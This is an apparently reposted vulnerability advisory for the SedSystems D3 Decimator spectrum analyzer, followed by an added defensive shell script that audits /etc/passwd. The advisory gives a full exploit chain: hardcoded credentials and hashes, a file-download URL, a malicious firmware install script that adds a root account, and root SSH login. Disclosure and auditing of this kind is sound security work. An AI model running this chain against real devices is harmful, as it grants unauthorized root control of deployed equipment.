TheHackerWorld Official

SedSystems D3 Decimator - Multiple Vulnerabilities

Featured reply

SedSystems D3 Decimator Multiple Vulnerabilities
================================================
Identification of the vulnerable device can be performed by scanning for 
TCP port 9784 which offers a default remote API. When connected to this 
device it will announce itself with "connected" or similar:

Connected to x.x.x.x.
Escape character is '^]'.
connected
status
status:3.1,3.0.12-1,0,0,41.0,Valid,Valid,540,-1.0,-1.0,5.1,11.4,-1.0
ping
ping:ok

The web service by default has a user interface for accessing the RF 
spectrum analyzer capability. The device itself from the API can give 
raw remote access to I/Q samples so can be used to remotely sniff the 
RF spectrum. The Web Configuration Manager can be found on 
"/cgi-bin/wcm.cgi". Multiple vulnerabilities exist.

Hardcoded credentials can be found in the /etc/passwd files contained 
within the default firmware since at least February 2013. The following 
entries can be found:

root:$1$zfy/fmyt$khz2yIyTFDoCkhxWw7eX8.:0:0:root:/:/bin/sh
admin:$1$$CoERg7ynjYLsj2j4glJ34.:1000:0:root:/:/bin/webonly

The admin user has a default password of "admin"; at this time the root 
user password is unknown, however there is no documented way of changing 
this trivially in a device. Using the "admin" user you can obtain a web 
session to the wcm.cgi and exploit a hidden arbitrary file download 
vulnerability discovered by reverse engineering the firmware:

http://x.x.x.x/cgi-bin/wcm.cgi?sessionid=009d45ecbabe015babe3300f&download=true&fullfilename=/etc/passwd

This will allow you to download any file and as the "admin" user has root
privileges you can obtain access to any file on the device. To execute 
arbitrary code you can make use of a vulnerability within the firmware 
flash routines. By uploading a crafted tarball that contains an "install" 
script in its root, the device will accept your firmware and then attempt
to execute ./install as root if found; you can then cancel the "flash" 
process to prevent bricking/modification of the device. The problem is due
to /usr/bin/install_flash which after using "tar" to unpack an archive 
to a tmp folder of /tmp/PID_of_tar does the following:

    # If the archive contained its own install script then use that

    if [ -x ./install ]; then
        ./install $all_args
        rc=$?
        exit $rc
    fi


Using this vulnerability you can upload a .tar file containing an install
file that looks like the following to obtain a root user account with 
adm1n/admin.

cat install 
#!/bin/sh
echo adm1n:\$1\$\$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/sh >> /etc/passwd

You can then SSH remotely to the device as PermitRootLogin is enabled 
by default.

E.g.

$ ssh -l adm1n x.x.x.x
adm1n@x.x.x.x's password: admin
# uname -a
Linux d3-decimator-540 2.6.34.10 #1 PREEMPT Wed Aug 8 10:04:25 CST 2012 armv5tejl GNU/Linux
# cat /proc/cpuinfo
Processor	: ARM926EJ-S rev 4 (v5l)
BogoMIPS	: 103.83
Features	: swp half thumb fastmult vfp edsp java 
CPU implementer	: 0x41
CPU architecture: 5TEJ
CPU variant	: 0x0
CPU part	: 0x926
CPU revision	: 4

Hardware	: SED 32XX Based CCA
Revision	: 0000
Serial		: 0000000000000000
# 
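An added audit helper, not from the advisory, for anyone checking a device or a firmware image for the conditions described above: it reads an /etc/passwd in the format shown on this page and flags the default admin hash quoted earlier and any uid-0 account other than root, which is exactly what the install script above creates. The sample passwd content is constructed from the entries on this page; the function names are hypothetical.

```shell
#!/bin/sh
# Added audit helper (not from the advisory): flag /etc/passwd entries that
# show the default "admin" hash quoted in the advisory or an extra uid-0
# account of the kind the advisory's install script appends.
# Function names are hypothetical; the sample file content is constructed.

# MD5-crypt hash of "admin" with an empty salt, as shipped in the firmware.
DEFAULT_ADMIN_HASH='$1$$CoERg7ynjYLsj2j4glJ34.'

# Constructed sample: the two shipped entries plus the appended account.
SAMPLE_PASSWD='root:$1$zfy/fmyt$khz2yIyTFDoCkhxWw7eX8.:0:0:root:/:/bin/sh
admin:$1$$CoERg7ynjYLsj2j4glJ34.:1000:0:root:/:/bin/webonly
adm1n:$1$$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/sh'

# audit_passwd [FILE]  (reads stdin when no file is given)
# Prints one "<finding> <user>" line per problem; exit 1 if any was found.
audit_passwd() {
    awk -F: -v known="$DEFAULT_ADMIN_HASH" '
        NF < 7 { next }                                     # skip malformed lines
        $2 == known { print "default-hash " $1; found = 1 }  # shipped admin hash
        $3 == 0 && $1 != "root" { print "extra-uid0 " $1; found = 1 }
        END { exit found ? 1 : 0 }
    ' "$@"
}

# count_findings [FILE]: number of findings as a plain value.
count_findings() {
    audit_passwd "$@" | wc -l | tr -d ' '
}

demo() {
    printf '%s\n' "$SAMPLE_PASSWD" | audit_passwd \
        && echo "no findings" \
        || echo "findings present"
}

demo
```

On the sample the helper reports default-hash for admin and both default-hash and extra-uid0 for adm1n; a clean file with only the root entry produces no output and exit status 0, so the function can be dropped into a periodic integrity check alongside a grep for PermitRootLogin in the sshd configuration.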

Vendor website can be found at the following url:
* http://www.sedsystems.ca/decimator_spectrum_analyzer

 -- prdelka